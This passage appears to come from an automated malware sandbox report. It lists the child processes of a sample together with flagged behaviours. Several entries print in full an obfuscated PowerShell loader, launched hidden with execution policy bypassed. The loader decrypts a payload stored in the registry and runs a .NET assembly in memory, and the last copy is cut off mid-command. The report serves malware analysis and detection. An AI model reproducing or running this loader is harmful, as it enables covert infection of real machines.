        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4424).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Hide Artifacts: Hidden Window
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3492
      - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4424).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:4256
      - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4424).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Hide Artifacts: Hidden Window
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:5220
      - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4424).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = 